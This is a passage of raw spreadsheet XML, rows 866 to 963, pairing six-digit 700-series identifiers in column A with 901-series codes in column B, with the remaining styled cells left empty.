    <row r="866" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A866" s="5">
        <v>700482</v>
      </c>
      <c r="B866" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D866" s="5"/>
      <c r="E866" s="3"/>
      <c r="F866" s="1"/>
      <c r="H866" s="1"/>
    </row>
    <row r="867" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A867" s="5">
        <v>700482</v>
      </c>
      <c r="B867" s="3">
        <v>901176</v>
      </c>
      <c r="D867" s="5"/>
      <c r="E867" s="3"/>
      <c r="F867" s="1"/>
      <c r="H867" s="1"/>
    </row>
    <row r="868" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A868" s="5">
        <v>700482</v>
      </c>
      <c r="B868" s="3">
        <v>901059.00199999998</v>
      </c>
      <c r="D868" s="5"/>
      <c r="E868" s="3"/>
      <c r="F868" s="1"/>
      <c r="H868" s="1"/>
    </row>
    <row r="869" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A869" s="5">
        <v>700482</v>
      </c>
      <c r="B869" s="3">
        <v>901059.00399999996</v>
      </c>
      <c r="D869" s="5"/>
      <c r="E869" s="3"/>
      <c r="F869" s="1"/>
      <c r="H869" s="1"/>
    </row>
    <row r="870" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A870" s="5">
        <v>700482</v>
      </c>
      <c r="B870" s="3">
        <v>901059.00600000005</v>
      </c>
      <c r="D870" s="5"/>
      <c r="E870" s="3"/>
      <c r="F870" s="1"/>
      <c r="H870" s="1"/>
    </row>
    <row r="871" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A871" s="5">
        <v>700482</v>
      </c>
      <c r="B871" s="3">
        <v>901059.00699999998</v>
      </c>
      <c r="D871" s="5"/>
      <c r="E871" s="3"/>
      <c r="F871" s="1"/>
      <c r="H871" s="1"/>
    </row>
    <row r="872" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A872" s="5">
        <v>700482</v>
      </c>
      <c r="B872" s="3">
        <v>901543.00100000005</v>
      </c>
      <c r="D872" s="5"/>
      <c r="E872" s="3"/>
      <c r="F872" s="1"/>
      <c r="H872" s="1"/>
    </row>
    <row r="873" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A873" s="5">
        <v>700482</v>
      </c>
      <c r="B873" s="3">
        <v>901543.00399999996</v>
      </c>
      <c r="D873" s="5"/>
      <c r="E873" s="3"/>
      <c r="F873" s="1"/>
      <c r="H873" s="1"/>
    </row>
    <row r="874" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A874" s="5">
        <v>700482</v>
      </c>
      <c r="B874" s="3">
        <v>901140</v>
      </c>
      <c r="D874" s="5"/>
      <c r="E874" s="3"/>
      <c r="F874" s="1"/>
      <c r="H874" s="1"/>
    </row>
    <row r="875" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A875" s="5">
        <v>700482</v>
      </c>
      <c r="B875" s="3">
        <v>901189</v>
      </c>
      <c r="D875" s="5"/>
      <c r="E875" s="3"/>
      <c r="F875" s="1"/>
      <c r="H875" s="1"/>
    </row>
    <row r="876" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A876" s="5">
        <v>700482</v>
      </c>
      <c r="B876" s="3">
        <v>901048</v>
      </c>
      <c r="D876" s="5"/>
      <c r="E876" s="3"/>
      <c r="F876" s="1"/>
      <c r="H876" s="1"/>
    </row>
    <row r="877" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A877" s="5">
        <v>700482</v>
      </c>
      <c r="B877" s="3">
        <v>901222.00199999998</v>
      </c>
      <c r="D877" s="5"/>
      <c r="E877" s="3"/>
      <c r="F877" s="1"/>
      <c r="H877" s="1"/>
    </row>
    <row r="878" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A878" s="5">
        <v>700482</v>
      </c>
      <c r="B878" s="3">
        <v>901564</v>
      </c>
      <c r="D878" s="5"/>
      <c r="E878" s="3"/>
      <c r="F878" s="1"/>
      <c r="H878" s="1"/>
    </row>
    <row r="879" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A879" s="5">
        <v>700482</v>
      </c>
      <c r="B879" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D879" s="5"/>
      <c r="E879" s="3"/>
      <c r="F879" s="1"/>
      <c r="H879" s="1"/>
    </row>
    <row r="880" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A880" s="5">
        <v>700482</v>
      </c>
      <c r="B880" s="3">
        <v>901105</v>
      </c>
      <c r="D880" s="5"/>
      <c r="E880" s="3"/>
      <c r="F880" s="1"/>
      <c r="H880" s="1"/>
    </row>
    <row r="881" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A881" s="5">
        <v>700482</v>
      </c>
      <c r="B881" s="3">
        <v>901056.00199999998</v>
      </c>
      <c r="D881" s="5"/>
      <c r="E881" s="3"/>
      <c r="F881" s="1"/>
      <c r="H881" s="1"/>
    </row>
    <row r="882" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A882" s="5">
        <v>700482</v>
      </c>
      <c r="B882" s="3">
        <v>901036.005</v>
      </c>
      <c r="D882" s="5"/>
      <c r="E882" s="3"/>
      <c r="F882" s="1"/>
      <c r="H882" s="1"/>
    </row>
    <row r="883" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A883" s="5">
        <v>700482</v>
      </c>
      <c r="B883" s="3">
        <v>901027</v>
      </c>
      <c r="D883" s="5"/>
      <c r="E883" s="3"/>
      <c r="F883" s="1"/>
      <c r="H883" s="1"/>
    </row>
    <row r="884" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A884" s="5">
        <v>700482</v>
      </c>
      <c r="B884" s="3">
        <v>901057</v>
      </c>
      <c r="D884" s="5"/>
      <c r="E884" s="3"/>
      <c r="F884" s="1"/>
      <c r="H884" s="1"/>
    </row>
    <row r="885" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A885" s="5">
        <v>700482</v>
      </c>
      <c r="B885" s="3">
        <v>901518</v>
      </c>
      <c r="D885" s="5"/>
      <c r="E885" s="3"/>
      <c r="F885" s="1"/>
      <c r="H885" s="1"/>
    </row>
    <row r="886" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A886" s="5">
        <v>700482</v>
      </c>
      <c r="B886" s="3">
        <v>901082</v>
      </c>
      <c r="D886" s="5"/>
      <c r="E886" s="3"/>
      <c r="F886" s="1"/>
      <c r="H886" s="1"/>
    </row>
    <row r="887" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A887" s="5">
        <v>700482</v>
      </c>
      <c r="B887" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D887" s="5"/>
      <c r="E887" s="3"/>
      <c r="F887" s="1"/>
      <c r="H887" s="1"/>
    </row>
    <row r="888" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A888" s="5">
        <v>700655</v>
      </c>
      <c r="B888" s="3">
        <v>901409</v>
      </c>
      <c r="D888" s="5"/>
      <c r="E888" s="3"/>
      <c r="F888" s="1"/>
      <c r="H888" s="1"/>
    </row>
    <row r="889" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A889" s="5">
        <v>700655</v>
      </c>
      <c r="B889" s="3">
        <v>901438</v>
      </c>
      <c r="D889" s="5"/>
      <c r="E889" s="3"/>
      <c r="F889" s="1"/>
      <c r="H889" s="1"/>
    </row>
    <row r="890" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A890" s="5">
        <v>700655</v>
      </c>
      <c r="B890" s="3">
        <v>901616</v>
      </c>
      <c r="D890" s="5"/>
      <c r="E890" s="3"/>
      <c r="F890" s="1"/>
      <c r="H890" s="1"/>
    </row>
    <row r="891" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A891" s="5">
        <v>700655</v>
      </c>
      <c r="B891" s="3">
        <v>901429</v>
      </c>
      <c r="D891" s="5"/>
      <c r="E891" s="3"/>
      <c r="F891" s="1"/>
      <c r="H891" s="1"/>
    </row>
    <row r="892" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A892" s="5">
        <v>700655</v>
      </c>
      <c r="B892" s="3">
        <v>901512</v>
      </c>
      <c r="D892" s="5"/>
      <c r="E892" s="3"/>
      <c r="F892" s="1"/>
      <c r="H892" s="1"/>
    </row>
    <row r="893" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A893" s="5">
        <v>700655</v>
      </c>
      <c r="B893" s="3">
        <v>901412</v>
      </c>
      <c r="D893" s="5"/>
      <c r="E893" s="3"/>
      <c r="F893" s="1"/>
      <c r="H893" s="1"/>
    </row>
    <row r="894" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A894" s="5">
        <v>700655</v>
      </c>
      <c r="B894" s="3">
        <v>901605</v>
      </c>
      <c r="D894" s="5"/>
      <c r="E894" s="3"/>
      <c r="F894" s="1"/>
      <c r="H894" s="1"/>
    </row>
    <row r="895" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A895" s="5">
        <v>700655</v>
      </c>
      <c r="B895" s="3">
        <v>901533</v>
      </c>
      <c r="D895" s="5"/>
      <c r="E895" s="3"/>
      <c r="F895" s="1"/>
      <c r="H895" s="1"/>
    </row>
    <row r="896" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A896" s="5">
        <v>700655</v>
      </c>
      <c r="B896" s="3">
        <v>901407</v>
      </c>
      <c r="D896" s="5"/>
      <c r="E896" s="3"/>
      <c r="F896" s="1"/>
      <c r="H896" s="1"/>
    </row>
    <row r="897" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A897" s="5">
        <v>700655</v>
      </c>
      <c r="B897" s="3">
        <v>901417</v>
      </c>
      <c r="D897" s="5"/>
      <c r="E897" s="3"/>
      <c r="F897" s="1"/>
      <c r="H897" s="1"/>
    </row>
    <row r="898" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A898" s="5">
        <v>700655</v>
      </c>
      <c r="B898" s="3">
        <v>901430</v>
      </c>
      <c r="D898" s="5"/>
      <c r="E898" s="3"/>
      <c r="F898" s="1"/>
      <c r="H898" s="1"/>
    </row>
    <row r="899" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A899" s="5">
        <v>700655</v>
      </c>
      <c r="B899" s="3">
        <v>901400</v>
      </c>
      <c r="D899" s="5"/>
      <c r="E899" s="3"/>
      <c r="F899" s="1"/>
      <c r="H899" s="1"/>
    </row>
    <row r="900" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A900" s="5">
        <v>700655</v>
      </c>
      <c r="B900" s="3">
        <v>901513</v>
      </c>
      <c r="D900" s="5"/>
      <c r="E900" s="3"/>
      <c r="F900" s="1"/>
      <c r="H900" s="1"/>
    </row>
    <row r="901" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A901" s="5">
        <v>700655</v>
      </c>
      <c r="B901" s="3">
        <v>901582</v>
      </c>
      <c r="D901" s="5"/>
      <c r="E901" s="3"/>
      <c r="F901" s="1"/>
      <c r="H901" s="1"/>
    </row>
    <row r="902" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A902" s="5">
        <v>700655</v>
      </c>
      <c r="B902" s="3">
        <v>901508</v>
      </c>
      <c r="D902" s="5"/>
      <c r="E902" s="3"/>
      <c r="F902" s="1"/>
      <c r="H902" s="1"/>
    </row>
    <row r="903" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A903" s="5">
        <v>700655</v>
      </c>
      <c r="B903" s="3">
        <v>901618</v>
      </c>
      <c r="D903" s="5"/>
      <c r="E903" s="3"/>
      <c r="F903" s="1"/>
      <c r="H903" s="1"/>
    </row>
    <row r="904" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A904" s="5">
        <v>700655</v>
      </c>
      <c r="B904" s="3">
        <v>901481</v>
      </c>
      <c r="D904" s="5"/>
      <c r="E904" s="3"/>
      <c r="F904" s="1"/>
      <c r="H904" s="1"/>
    </row>
    <row r="905" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A905" s="5">
        <v>700119</v>
      </c>
      <c r="B905" s="3">
        <v>901003.005</v>
      </c>
      <c r="D905" s="5"/>
      <c r="E905" s="3"/>
      <c r="F905" s="1"/>
      <c r="H905" s="1"/>
    </row>
    <row r="906" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A906" s="5">
        <v>700119</v>
      </c>
      <c r="B906" s="3">
        <v>901010</v>
      </c>
      <c r="D906" s="5"/>
      <c r="E906" s="3"/>
      <c r="F906" s="1"/>
      <c r="H906" s="1"/>
    </row>
    <row r="907" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A907" s="5">
        <v>700119</v>
      </c>
      <c r="B907" s="3">
        <v>901560</v>
      </c>
      <c r="D907" s="5"/>
      <c r="E907" s="3"/>
      <c r="F907" s="1"/>
      <c r="H907" s="1"/>
    </row>
    <row r="908" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A908" s="5">
        <v>700119</v>
      </c>
      <c r="B908" s="3">
        <v>901123</v>
      </c>
      <c r="D908" s="5"/>
      <c r="E908" s="3"/>
      <c r="F908" s="1"/>
      <c r="H908" s="1"/>
    </row>
    <row r="909" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A909" s="5">
        <v>700119</v>
      </c>
      <c r="B909" s="3">
        <v>901115</v>
      </c>
      <c r="D909" s="5"/>
      <c r="E909" s="3"/>
      <c r="F909" s="1"/>
      <c r="H909" s="1"/>
    </row>
    <row r="910" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A910" s="5">
        <v>700119</v>
      </c>
      <c r="B910" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D910" s="5"/>
      <c r="E910" s="3"/>
      <c r="F910" s="1"/>
      <c r="H910" s="1"/>
    </row>
    <row r="911" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A911" s="5">
        <v>700119</v>
      </c>
      <c r="B911" s="3">
        <v>901120</v>
      </c>
      <c r="D911" s="5"/>
      <c r="E911" s="3"/>
      <c r="F911" s="1"/>
      <c r="H911" s="1"/>
    </row>
    <row r="912" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A912" s="5">
        <v>700119</v>
      </c>
      <c r="B912" s="3">
        <v>901113</v>
      </c>
      <c r="D912" s="5"/>
      <c r="E912" s="3"/>
      <c r="F912" s="1"/>
      <c r="H912" s="1"/>
    </row>
    <row r="913" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A913" s="5">
        <v>700119</v>
      </c>
      <c r="B913" s="3">
        <v>901082</v>
      </c>
      <c r="D913" s="5"/>
      <c r="E913" s="3"/>
      <c r="F913" s="1"/>
      <c r="H913" s="1"/>
    </row>
    <row r="914" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A914" s="5">
        <v>700454</v>
      </c>
      <c r="B914" s="3">
        <v>901010</v>
      </c>
      <c r="D914" s="5"/>
      <c r="E914" s="3"/>
      <c r="F914" s="1"/>
      <c r="H914" s="1"/>
    </row>
    <row r="915" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A915" s="5">
        <v>700454</v>
      </c>
      <c r="B915" s="3">
        <v>901560</v>
      </c>
      <c r="D915" s="5"/>
      <c r="E915" s="3"/>
      <c r="F915" s="1"/>
      <c r="H915" s="1"/>
    </row>
    <row r="916" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A916" s="5">
        <v>700454</v>
      </c>
      <c r="B916" s="3">
        <v>901123</v>
      </c>
      <c r="D916" s="5"/>
      <c r="E916" s="3"/>
      <c r="F916" s="1"/>
      <c r="H916" s="1"/>
    </row>
    <row r="917" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A917" s="5">
        <v>700454</v>
      </c>
      <c r="B917" s="3">
        <v>901115</v>
      </c>
      <c r="D917" s="5"/>
      <c r="E917" s="3"/>
      <c r="F917" s="1"/>
      <c r="H917" s="1"/>
    </row>
    <row r="918" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A918" s="5">
        <v>700454</v>
      </c>
      <c r="B918" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D918" s="5"/>
      <c r="E918" s="3"/>
      <c r="F918" s="1"/>
      <c r="H918" s="1"/>
    </row>
    <row r="919" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A919" s="5">
        <v>700454</v>
      </c>
      <c r="B919" s="3">
        <v>901120</v>
      </c>
      <c r="D919" s="5"/>
      <c r="E919" s="3"/>
      <c r="F919" s="1"/>
      <c r="H919" s="1"/>
    </row>
    <row r="920" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A920" s="5">
        <v>700454</v>
      </c>
      <c r="B920" s="3">
        <v>901113</v>
      </c>
      <c r="D920" s="5"/>
      <c r="E920" s="3"/>
      <c r="F920" s="1"/>
      <c r="H920" s="1"/>
    </row>
    <row r="921" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A921" s="5">
        <v>700454</v>
      </c>
      <c r="B921" s="3">
        <v>901082</v>
      </c>
      <c r="D921" s="5"/>
      <c r="E921" s="3"/>
      <c r="F921" s="1"/>
      <c r="H921" s="1"/>
    </row>
    <row r="922" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A922" s="5">
        <v>700025</v>
      </c>
      <c r="B922" s="3">
        <v>901059</v>
      </c>
      <c r="D922" s="5"/>
      <c r="E922" s="3"/>
      <c r="F922" s="1"/>
      <c r="H922" s="1"/>
    </row>
    <row r="923" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A923" s="5">
        <v>700025</v>
      </c>
      <c r="B923" s="3">
        <v>901102</v>
      </c>
      <c r="D923" s="5"/>
      <c r="E923" s="3"/>
      <c r="F923" s="1"/>
      <c r="H923" s="1"/>
    </row>
    <row r="924" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A924" s="5">
        <v>700274</v>
      </c>
      <c r="B924" s="3">
        <v>901098.00399999996</v>
      </c>
      <c r="D924" s="5"/>
      <c r="E924" s="3"/>
      <c r="F924" s="1"/>
      <c r="H924" s="1"/>
    </row>
    <row r="925" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A925" s="5">
        <v>700274</v>
      </c>
      <c r="B925" s="3">
        <v>901560.00100000005</v>
      </c>
      <c r="D925" s="5"/>
      <c r="E925" s="3"/>
      <c r="F925" s="1"/>
      <c r="H925" s="1"/>
    </row>
    <row r="926" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A926" s="5">
        <v>700274</v>
      </c>
      <c r="B926" s="3">
        <v>901217</v>
      </c>
      <c r="D926" s="5"/>
      <c r="E926" s="3"/>
      <c r="F926" s="1"/>
      <c r="H926" s="1"/>
    </row>
    <row r="927" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A927" s="5">
        <v>700274</v>
      </c>
      <c r="B927" s="3">
        <v>901136.00100000005</v>
      </c>
      <c r="D927" s="5"/>
      <c r="E927" s="3"/>
      <c r="F927" s="1"/>
      <c r="H927" s="1"/>
    </row>
    <row r="928" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A928" s="5">
        <v>700274</v>
      </c>
      <c r="B928" s="3">
        <v>901543.00100000005</v>
      </c>
      <c r="D928" s="5"/>
      <c r="E928" s="3"/>
      <c r="F928" s="1"/>
      <c r="H928" s="1"/>
    </row>
    <row r="929" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A929" s="5">
        <v>700274</v>
      </c>
      <c r="B929" s="3">
        <v>901555.00100000005</v>
      </c>
      <c r="D929" s="5"/>
      <c r="E929" s="3"/>
      <c r="F929" s="1"/>
      <c r="H929" s="1"/>
    </row>
    <row r="930" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A930" s="5">
        <v>700274</v>
      </c>
      <c r="B930" s="3">
        <v>901005</v>
      </c>
      <c r="D930" s="5"/>
      <c r="E930" s="3"/>
      <c r="F930" s="1"/>
      <c r="H930" s="1"/>
    </row>
    <row r="931" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A931" s="5">
        <v>700274</v>
      </c>
      <c r="B931" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D931" s="5"/>
      <c r="E931" s="3"/>
      <c r="F931" s="1"/>
      <c r="H931" s="1"/>
    </row>
    <row r="932" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A932" s="5">
        <v>700274</v>
      </c>
      <c r="B932" s="3">
        <v>901564.00100000005</v>
      </c>
      <c r="D932" s="5"/>
      <c r="E932" s="3"/>
      <c r="F932" s="1"/>
      <c r="H932" s="1"/>
    </row>
    <row r="933" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A933" s="5">
        <v>700274</v>
      </c>
      <c r="B933" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D933" s="5"/>
      <c r="E933" s="3"/>
      <c r="F933" s="1"/>
      <c r="H933" s="1"/>
    </row>
    <row r="934" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A934" s="5">
        <v>700274</v>
      </c>
      <c r="B934" s="3">
        <v>901105</v>
      </c>
      <c r="D934" s="5"/>
      <c r="E934" s="3"/>
      <c r="F934" s="1"/>
      <c r="H934" s="1"/>
    </row>
    <row r="935" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A935" s="5">
        <v>700274</v>
      </c>
      <c r="B935" s="3">
        <v>901056.00199999998</v>
      </c>
      <c r="D935" s="5"/>
      <c r="E935" s="3"/>
      <c r="F935" s="1"/>
      <c r="H935" s="1"/>
    </row>
    <row r="936" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A936" s="5">
        <v>700274</v>
      </c>
      <c r="B936" s="3">
        <v>901036.005</v>
      </c>
      <c r="D936" s="5"/>
      <c r="E936" s="3"/>
      <c r="F936" s="1"/>
      <c r="H936" s="1"/>
    </row>
    <row r="937" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A937" s="5">
        <v>700274</v>
      </c>
      <c r="B937" s="3">
        <v>901016</v>
      </c>
      <c r="D937" s="5"/>
      <c r="E937" s="3"/>
      <c r="F937" s="1"/>
      <c r="H937" s="1"/>
    </row>
    <row r="938" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A938" s="5">
        <v>700274</v>
      </c>
      <c r="B938" s="3">
        <v>901569.00100000005</v>
      </c>
      <c r="D938" s="5"/>
      <c r="E938" s="3"/>
      <c r="F938" s="1"/>
      <c r="H938" s="1"/>
    </row>
    <row r="939" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A939" s="5">
        <v>700077</v>
      </c>
      <c r="B939" s="3">
        <v>901059.00399999996</v>
      </c>
      <c r="D939" s="5"/>
      <c r="E939" s="3"/>
      <c r="F939" s="1"/>
      <c r="H939" s="1"/>
    </row>
    <row r="940" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A940" s="5">
        <v>700077</v>
      </c>
      <c r="B940" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D940" s="5"/>
      <c r="E940" s="3"/>
      <c r="F940" s="1"/>
      <c r="H940" s="1"/>
    </row>
    <row r="941" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A941" s="5">
        <v>700077</v>
      </c>
      <c r="B941" s="3">
        <v>901041</v>
      </c>
      <c r="D941" s="5"/>
      <c r="E941" s="3"/>
      <c r="F941" s="1"/>
      <c r="H941" s="1"/>
    </row>
    <row r="942" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A942" s="5">
        <v>700077</v>
      </c>
      <c r="B942" s="3">
        <v>901105</v>
      </c>
      <c r="D942" s="5"/>
      <c r="E942" s="3"/>
      <c r="F942" s="1"/>
      <c r="H942" s="1"/>
    </row>
    <row r="943" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A943" s="5">
        <v>700351</v>
      </c>
      <c r="B943" s="3">
        <v>901071.00300000003</v>
      </c>
      <c r="D943" s="5"/>
      <c r="E943" s="3"/>
      <c r="F943" s="1"/>
      <c r="H943" s="1"/>
    </row>
    <row r="944" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A944" s="5">
        <v>700351</v>
      </c>
      <c r="B944" s="3">
        <v>901547.00399999996</v>
      </c>
      <c r="D944" s="5"/>
      <c r="E944" s="3"/>
      <c r="F944" s="1"/>
      <c r="H944" s="1"/>
    </row>
    <row r="945" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A945" s="5">
        <v>700351</v>
      </c>
      <c r="B945" s="3">
        <v>901041</v>
      </c>
      <c r="D945" s="5"/>
      <c r="E945" s="3"/>
      <c r="F945" s="1"/>
      <c r="H945" s="1"/>
    </row>
    <row r="946" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A946" s="5">
        <v>700351</v>
      </c>
      <c r="B946" s="3">
        <v>901083</v>
      </c>
      <c r="D946" s="5"/>
      <c r="E946" s="3"/>
      <c r="F946" s="1"/>
      <c r="H946" s="1"/>
    </row>
    <row r="947" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A947" s="5">
        <v>700351</v>
      </c>
      <c r="B947" s="3">
        <v>901105</v>
      </c>
      <c r="D947" s="5"/>
      <c r="E947" s="3"/>
      <c r="F947" s="1"/>
      <c r="H947" s="1"/>
    </row>
    <row r="948" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A948" s="5">
        <v>700351</v>
      </c>
      <c r="B948" s="3">
        <v>901057</v>
      </c>
      <c r="D948" s="5"/>
      <c r="E948" s="3"/>
      <c r="F948" s="1"/>
      <c r="H948" s="1"/>
    </row>
    <row r="949" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A949" s="5">
        <v>700351</v>
      </c>
      <c r="B949" s="3">
        <v>901113</v>
      </c>
      <c r="D949" s="5"/>
      <c r="E949" s="3"/>
      <c r="F949" s="1"/>
      <c r="H949" s="1"/>
    </row>
    <row r="950" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A950" s="5">
        <v>700351</v>
      </c>
      <c r="B950" s="3">
        <v>901082</v>
      </c>
      <c r="D950" s="5"/>
      <c r="E950" s="3"/>
      <c r="F950" s="1"/>
      <c r="H950" s="1"/>
    </row>
    <row r="951" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A951" s="5">
        <v>700351</v>
      </c>
      <c r="B951" s="3">
        <v>901033</v>
      </c>
      <c r="D951" s="5"/>
      <c r="E951" s="3"/>
      <c r="F951" s="1"/>
      <c r="H951" s="1"/>
    </row>
    <row r="952" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A952" s="5">
        <v>700351</v>
      </c>
      <c r="B952" s="3">
        <v>901124</v>
      </c>
      <c r="D952" s="5"/>
      <c r="E952" s="3"/>
      <c r="F952" s="1"/>
      <c r="H952" s="1"/>
    </row>
    <row r="953" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A953" s="5">
        <v>700030</v>
      </c>
      <c r="B953" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D953" s="5"/>
      <c r="E953" s="3"/>
      <c r="F953" s="1"/>
      <c r="H953" s="1"/>
    </row>
    <row r="954" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A954" s="5">
        <v>700030</v>
      </c>
      <c r="B954" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D954" s="5"/>
      <c r="E954" s="3"/>
      <c r="F954" s="1"/>
      <c r="H954" s="1"/>
    </row>
    <row r="955" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A955" s="5">
        <v>700030</v>
      </c>
      <c r="B955" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D955" s="5"/>
      <c r="E955" s="3"/>
      <c r="F955" s="1"/>
      <c r="H955" s="1"/>
    </row>
    <row r="956" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A956" s="5">
        <v>700030</v>
      </c>
      <c r="B956" s="3">
        <v>901136.00100000005</v>
      </c>
      <c r="D956" s="5"/>
      <c r="E956" s="3"/>
      <c r="F956" s="1"/>
      <c r="H956" s="1"/>
    </row>
    <row r="957" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A957" s="5">
        <v>700030</v>
      </c>
      <c r="B957" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D957" s="5"/>
      <c r="E957" s="3"/>
      <c r="F957" s="1"/>
      <c r="H957" s="1"/>
    </row>
    <row r="958" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A958" s="5">
        <v>700030</v>
      </c>
      <c r="B958" s="3">
        <v>901030</v>
      </c>
      <c r="D958" s="5"/>
      <c r="E958" s="3"/>
      <c r="F958" s="1"/>
      <c r="H958" s="1"/>
    </row>
    <row r="959" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A959" s="5">
        <v>700030</v>
      </c>
      <c r="B959" s="3">
        <v>901114.00100000005</v>
      </c>
      <c r="D959" s="5"/>
      <c r="E959" s="3"/>
      <c r="F959" s="1"/>
      <c r="H959" s="1"/>
    </row>
    <row r="960" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A960" s="5">
        <v>700030</v>
      </c>
      <c r="B960" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D960" s="5"/>
      <c r="E960" s="3"/>
      <c r="F960" s="1"/>
      <c r="H960" s="1"/>
    </row>
    <row r="961" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A961" s="5">
        <v>700030</v>
      </c>
      <c r="B961" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D961" s="5"/>
      <c r="E961" s="3"/>
      <c r="F961" s="1"/>
      <c r="H961" s="1"/>
    </row>
    <row r="962" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A962" s="5">
        <v>700030</v>
      </c>
      <c r="B962" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D962" s="5"/>
      <c r="E962" s="3"/>
      <c r="F962" s="1"/>
      <c r="H962" s="1"/>
    </row>
    <row r="963" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A963" s="5">
        <v>700030</v>
      </c>
      <c r="B963" s="3">
        <v>901027</v>
      </c>
      <c r="D963" s="5"/>
      <c r="E963" s="3"/>
      <c r="F963" s="1"/>
      <c r="H963" s="1"/>
    </row>
